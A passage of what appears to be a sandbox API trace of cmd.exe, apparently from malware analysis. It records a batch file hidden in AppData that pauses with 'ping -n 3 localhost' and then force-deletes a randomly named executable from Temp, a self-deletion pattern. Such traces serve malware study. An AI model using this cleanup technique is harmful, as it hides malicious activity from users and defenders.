hConsoleHandle=0x7, lpMode=0x14effc | out: lpMode=0x14effc) returned 1 [0175.445] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.445] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f028, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f028*=0x2) returned 1 [0175.446] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0175.446] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="CD") returned 13 
[0175.446] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0175.446] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0175.446] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0175.446] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0175.446] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0175.446] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0175.446] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0175.446] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0175.446] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0175.446] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0175.446] _wcsicmp (_String1="ping", _String2="START") returned -3 [0175.446] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0175.446] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0175.446] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0175.446] _wcsicmp (_String1="ping", 
_String2="PUSHD") returned -12 [0175.446] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0175.446] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0175.446] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0175.446] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0175.446] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0175.446] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0175.447] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0175.447] SetErrorMode (uMode=0x0) returned 0x0 [0175.447] SetErrorMode (uMode=0x1) returned 0x0 [0175.447] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x170550, lpFilePart=0x14ede0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14ede0*="Desktop") returned 0x18 [0175.447] SetErrorMode (uMode=0x0) returned 0x1 [0175.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.447] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0175.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.447] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0xffffffff [0175.448] GetLastError () returned 0x2 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0xffffffff [0175.448] GetLastError () returned 0x2 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, 
lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0x170838 [0175.448] FindClose (in: hFindFile=0x170838 | out: hFindFile=0x170838) returned 1 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0xffffffff [0175.448] GetLastError () returned 0x2 [0175.448] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x14eb5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb5c) returned 0x170838 [0175.449] FindClose (in: hFindFile=0x170838 | out: hFindFile=0x170838) returned 1 [0175.449] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0175.449] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0175.449] GetConsoleTitleW (in: lpConsoleTitle=0x14ebac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.449] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.449] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0175.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.449] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0xffffffff [0175.449] GetLastError () returned 0x2 [0175.449] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, 
dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0xffffffff [0175.450] GetLastError () returned 0x2 [0175.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0x170d80 [0175.450] FindClose (in: hFindFile=0x170d80 | out: hFindFile=0x170d80) returned 1 [0175.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0xffffffff [0175.450] GetLastError () returned 0x2 [0175.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x14e448, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e448) returned 0x170d80 [0175.450] FindClose (in: hFindFile=0x170d80 | out: hFindFile=0x170d80) returned 1 [0175.450] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0175.450] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0175.450] GetConsoleTitleW (in: lpConsoleTitle=0x14e940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.450] InitializeProcThreadAttributeList (in: lpAttributeList=0x14e7c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14e890 | out: lpAttributeList=0x14e7c8, lpSize=0x14e890) returned 1 [0175.450] UpdateProcThreadAttribute (in: lpAttributeList=0x14e7c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x14e888, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14e7c8, lpPreviousValue=0x0) returned 1 [0175.450] GetStartupInfoW (in: lpStartupInfo=0x14e784 | out: lpStartupInfo=0x14e784*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, 
wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0175.451] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0175.452] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14e824*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e870 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x14e870*(hProcess=0x54, hThread=0x58, dwProcessId=0xa70, dwThreadId=0xaac)) returned 1 [0175.454] CloseHandle (hObject=0x58) returned 1 [0175.454] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0175.454] GetEnvironmentStringsW () returned 0x160970* [0175.454] FreeEnvironmentStringsW (penv=0x160970) returned 1 [0175.454] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0178.403] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x14e764 | out: lpExitCode=0x14e764*=0x0) returned 1 [0178.403] CloseHandle (hObject=0x54) returned 1 [0178.403] _vsnwprintf (in: _Buffer=0x14e8ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x14e770 | out: _Buffer="00000000") returned 8 [0178.403] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.403] GetEnvironmentStringsW () returned 0x162c28* [0178.403] FreeEnvironmentStringsW (penv=0x162c28) returned 1 [0178.403] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.403] GetEnvironmentStringsW () returned 0x162c28* [0178.403] FreeEnvironmentStringsW 
(penv=0x162c28) returned 1 [0178.403] DeleteProcThreadAttributeList (in: lpAttributeList=0x14e7c8 | out: lpAttributeList=0x14e7c8) [0178.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.404] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.404] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.404] SetConsoleInputExeNameW () returned 0x1 [0178.404] GetConsoleOutputCP () returned 0x1b5 [0178.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.404] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.404] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0178.404] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0178.404] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.404] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0178.405] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.405] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0178.405] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x7c, lpOverlapped=0x0) returned 1 [0178.405] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.405] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n") returned 62 [0178.405] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.405] GetFileType (hFile=0x54) returned 0x1 [0178.405] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.405] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.406] _tell (_FileHandle=3) returned 83 [0178.406] _close (_FileHandle=3) returned 0 [0178.407] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ed9c | out: _Buffer="\r\n") returned 2 [0178.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.407] GetFileType (hFile=0x7) returned 0x2 [0178.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed5c | out: lpMode=0x14ed5c) returned 1 [0178.407] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.407] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ed88, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed88*=0x2) returned 1 [0178.407] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0178.407] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.407] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed98 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.407] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x14ed98 | out: _Buffer=">") returned 1 [0178.407] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0178.407] GetFileType (hFile=0x7) returned 0x2 [0178.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.407] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed60 | out: lpMode=0x14ed60) returned 1 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x14ed8c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x14ed8c*=0x19) returned 1 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] GetFileType (hFile=0x7) returned 0x2 [0178.408] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.408] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efe4 | out: lpMode=0x14efe4) returned 1 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x16f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14f010, lpReserved=0x0 | out: lpBuffer=0x16f008*, lpNumberOfCharsWritten=0x14f010*=0x3) returned 1 [0178.408] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f01c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" ") returned 58 [0178.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.408] GetFileType (hFile=0x7) returned 0x2 [0178.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efdc | out: lpMode=0x14efdc) returned 1 [0178.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.409] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x14f008, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f008*=0x3a) returned 1 [0178.409] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f03c | out: _Buffer="\r\n") returned 2 [0178.409] _get_osfhandle (_FileHandle=1) returned 
0x7 [0178.409] GetFileType (hFile=0x7) returned 0x2 [0178.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14effc | out: lpMode=0x14effc) returned 1 [0178.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.409] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f028, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14f028*=0x2) returned 1 [0178.410] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0178.410] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0178.410] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0178.410] GetConsoleTitleW (in: lpConsoleTitle=0x14ebac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.410] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14dc28, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14dc24*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0178.410] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0178.410] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.410] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.410] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x2020 [0178.411] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0178.411] _wcsicmp (_String1="WsPgAGWN.exe", _String2=".") returned 73 [0178.411] _wcsicmp (_String1="WsPgAGWN.exe", _String2="..") returned 73 [0178.411] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x2020 [0178.411] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", fInfoLevelId=0x0, lpFindFileData=0x170554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x170554) returned 0x150aa8 [0178.411] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 1 [0178.412] FindNextFileW (in: hFindFile=0x150aa8, lpFindFileData=0x170554 | out: lpFindFileData=0x170554) returned 0 [0178.412] GetLastError () returned 0x12 [0178.412] FindClose (in: hFindFile=0x150aa8 | out: hFindFile=0x150aa8) returned 1 [0178.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.413] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.413] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.413] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.413] SetConsoleInputExeNameW () returned 0x1 [0178.413] GetConsoleOutputCP () returned 0x1b5 [0178.413] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.413] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.413] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\CbFFjy09.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\cbffjy09.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14efe4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0178.413] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0178.414] _get_osfhandle (_FileHandle=3) returned 
0x54 [0178.414] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.414] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.414] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0178.414] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efc8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efc8*=0x3e, lpOverlapped=0x0) returned 1 [0178.414] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"\r\n") returned 62 [0178.414] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.414] GetFileType (hFile=0x54) returned 0x1 [0178.414] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.414] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.415] _tell (_FileHandle=3) returned 145 [0178.415] _close (_FileHandle=3) returned 0 [0178.415] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ed9c | out: _Buffer="\r\n") returned 2 [0178.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.415] GetFileType (hFile=0x7) returned 0x2 [0178.415] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.415] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed5c | out: lpMode=0x14ed5c) returned 1 [0178.415] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.415] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ed88, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed88*=0x2) returned 1 [0178.416] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.416] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed98 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.416] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x14ed98 | out: _Buffer=">") returned 1 [0178.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.416] GetFileType (hFile=0x7) returned 0x2 [0178.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.416] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ed60 | out: lpMode=0x14ed60) returned 1 [0178.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.416] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x14ed8c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x14ed8c*=0x19) returned 1 [0178.416] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.416] GetFileType (hFile=0x7) returned 0x2 [0178.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.416] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efe4 | out: lpMode=0x14efe4) returned 1 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x16f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14f010, lpReserved=0x0 | out: lpBuffer=0x16f008*, lpNumberOfCharsWritten=0x14f010*=0x3) returned 1 [0178.417] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f01c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" ") returned 58 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] GetFileType (hFile=0x7) returned 0x2 [0178.417] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.417] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14efdc | out: lpMode=0x14efdc) returned 1 [0178.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.417] 
